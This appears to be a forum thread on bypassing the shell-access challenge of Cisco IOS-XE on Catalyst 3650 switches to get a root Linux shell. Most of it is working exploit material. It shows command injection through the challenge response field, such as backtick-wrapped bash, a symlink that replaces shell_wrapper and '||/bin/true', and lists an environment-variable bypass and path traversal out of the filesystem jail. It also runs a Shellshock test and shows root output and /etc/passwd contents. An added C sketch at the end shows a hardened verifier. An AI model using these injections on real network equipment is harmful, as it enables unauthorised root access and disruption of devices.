Catalyst-3650#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed
I remember being able to get through to the shell by entering something trivial like '/bin/sh' instead. I am sure it wasn't a dream, but I clearly remember I didn't write it down because I'm foolish like that..
So how do I drop into bash from IOS-XE on a Cisco Catalyst 3650?
Switch#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 438e1fd36da9cfdb61e655353a48bb9cf69f274ab2d2[..]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`/bin/sh`
sh-3.2# uname -a
sh-3.2#
sh-3.2# uname -2323
uname: invalid option -- '2'
Try `uname --help' for more information.
AHA SO WE HAVE STDERR, but not STDOUT..
sh-3.2# ls
sh-3.2# pwd
sh-3.2# whoami
sh-3.2# exit
exit
Key verification failed
Alright then, let's go again. More, code execution before key verification. Nice.
Switch#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: b577ea00feb8c833d725a85c6c53e1839ab9[..]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`bash 1>&2`
bash-3.2# uname -a
Linux localhost 2.6.32.59-cavium-octeon2.cge-cavium-octeon #1 SMP PREEMPT Fri May 10 11:48:14 PDT 2013 mips64 GNU/Linux
bash-3.2# ls
BinOS config hugepages lic0 rommon_to_env sys webui
RP_0_0_cli crashinfo include lic1 root tftp
auto dev install lkern_init sbin tmp
bin drec0 isan misc selinux ucode0
bsn epc issu mnt share usr
chasfs etc lib obfl0 space var
common flash lib32 proc spi vol
bash-3.2# whoami
root
bash-3.2# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
binos:x:85:85:binos administrative user:/usr/binos/conf:/usr/binos/conf/bshell.sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
[..]
Cisco, please don't fix this or I will never ever upgrade this image.
A silly one:
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`reboot`
SecureShell: <program name> SecureShell <Hash> <Signature> [debug]Key verification failed
Switch#
Unmounting ng3k filesystems...
Unmounted /dev/sda3...
Warning! - some ng3k filesystems may not have unmounted cleanly...
Please stand by while rebooting the system...
Restarting system.
Booting...Initializing RAM +++++++@@@@@@@@...++++++++
Uh.. netcat is there. I'm starting to have second thoughts if posting this on open waters is a good idea..
[code]
Catalyst-3650#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
/bin/sh
Key verification failed
[/code]
What did you do to fix the "Key verification failed" error situation?
[EXTRA] Building a toolchain for:
[EXTRA] build = x86_64-unknown-linux-gnu
[EXTRA] host = x86_64-unknown-linux-gnu
[EXTRA] target = mips-unknown-elf
bash-3.2# file /mnt/usb0/ninvaders
/mnt/usb0/ninvaders: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.18, with unknown capability
0x41000000 = 0xf676e75, stripped
Stay tuned. Returning next week. Holidays.
---- In other news.
Please enter the shell access response based on the above
challenge (Press "Enter" when done or to quit.):
`sh 1>&2`
sh-3.2# env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
First I got rid of the annoying RSA challenge altogether.
Switch#req sys shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: a99bac81d1ea605579e81d1d5[..]
Please enter the shell access response based on the above challenge (Press "Enter" when done or to quit.):
`bash -c "mv /usr/binos/bin/shell_wrapper /tmp/ohboy; ln -s /bin/bash /usr/binos/bin/shell_wrapper; exit"`
SecureShell: <program name> SecureShell <Hash> <Signature> [debug]Key verification failed
Switch#req sys shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
[Switch:/]$ whoami ; uname -a
root
Linux Switch 2.6.32.59-cavium-octeon2.cge-cavium-octeon #1 SMP PREEMPT Fri May 10 11:48:14 PDT 2013 mips64 GNU/Linux
I wish you hadn't gone public with this, so the rest of us could have enjoyed our extra debugging toolset. It's quite easy to fix this so that the Linux shell stops working.
So when you request shell, the following happens:
a) shell_wrapper calls system('code_sign_verify_nova_pkg SecureShell challenge response') (same binary is used to verify the images)
b) code_sign_verify_nova_pkg reads via libcodesign_pd.so+libflash.so 2k from /dev/mtdblock6, signs challenge, compares to response and returns 0 if it is valid, otherwise
c) so anything like ||/bin/true will work just fine
shell_wrapper ignores verification if DISABLE_SHELL_AUTHENTICATION=1 in environment
mtdblock6 RSA public key can be changed, so you can generate valid response by having its secret companion
you can escape IOS filesystem jail (/mnt/sd3/user) with ../../ so copy foo ../../etc would copy foo to /etc
You have to have access to the device already to call the Linux CLI. I'd compare it to 'jailbreak', you're getting access to the system you already paid for, access you should have had to begin with.
Some other IOS-XE platforms have not restricted the access. IOS-XR still openly allows access to the QNX shell. JunOS still allows access to the FreeBSD shell (albeit binaries have been signed for a few years now, which hurt legit use-cases).
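
The flow in steps a) to c) above fails because the typed response reaches system() as part of a shell command line. The C sketch below is an added example, not Cisco's code or code from this thread: it validates both tokens and runs the verifier through execve() with an empty environment, so no shell ever parses the input. The hex-only response format, the 1024-character bound, the function names and the use of /bin/true as a stand-in verifier are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define MAX_TOKEN 1024 /* assumed upper bound on challenge/response length */

/* 1 if s is a non-empty hex string of at most MAX_TOKEN characters. */
int is_hex_token(const char *s) {
    size_t n = 0;
    if (s == NULL) return 0;
    for (; s[n] != '\0'; n++)
        if (n >= MAX_TOKEN || !isxdigit((unsigned char)s[n])) return 0;
    return n > 0;
}

/* Runs `verifier SecureShell <challenge> <response>` without a shell.
 * Returns 1 only if the verifier itself exits with status 0. */
int verify_response(const char *verifier, const char *challenge,
                    const char *response) {
    int status;
    pid_t pid;

    /* Reject anything a shell could interpret before it goes anywhere. */
    if (!is_hex_token(challenge) || !is_hex_token(response)) return 0;

    pid = fork();
    if (pid < 0) return 0;              /* fail closed */
    if (pid == 0) {
        /* Each value is one argv element; no command line is ever parsed. */
        char *const argv[] = {(char *)verifier, "SecureShell",
                              (char *)challenge, (char *)response, NULL};
        char *const envp[] = {NULL};    /* nothing inherited from the caller */
        execve(verifier, argv, envp);
        _exit(127);                     /* exec failed: treat as rejection */
    }
    if (waitpid(pid, &status, 0) < 0) return 0;
    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
}

int main(void) {
    /* Constructed inputs; /bin/true stands in for the real verifier. */
    printf("hex response: %d\n", verify_response("/bin/true", "94d5c017", "ab12"));
    printf("'||/bin/true': %d\n", verify_response("/bin/true", "94d5c017", "||/bin/true"));
    return 0;
}
```

A wrapper built this way also has to ignore environment overrides such as the DISABLE_SHELL_AUTHENTICATION variable mentioned above, since the caller controls its environment.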